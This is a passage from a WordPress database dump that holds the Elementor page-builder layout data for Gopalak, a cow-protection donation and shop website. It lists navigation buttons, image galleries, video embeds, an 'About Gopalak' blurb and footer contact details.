being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12240,2008,'_elementor_page_assets','a:0:{}'),(12242,2009,'_elementor_edit_mode','builder'),(12243,2009,'_elementor_template_type','wp-page'),(12244,2009,'_elementor_version','3.7.8'),(12245,2009,'_wp_page_template','elementor_canvas'),(12246,2009,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 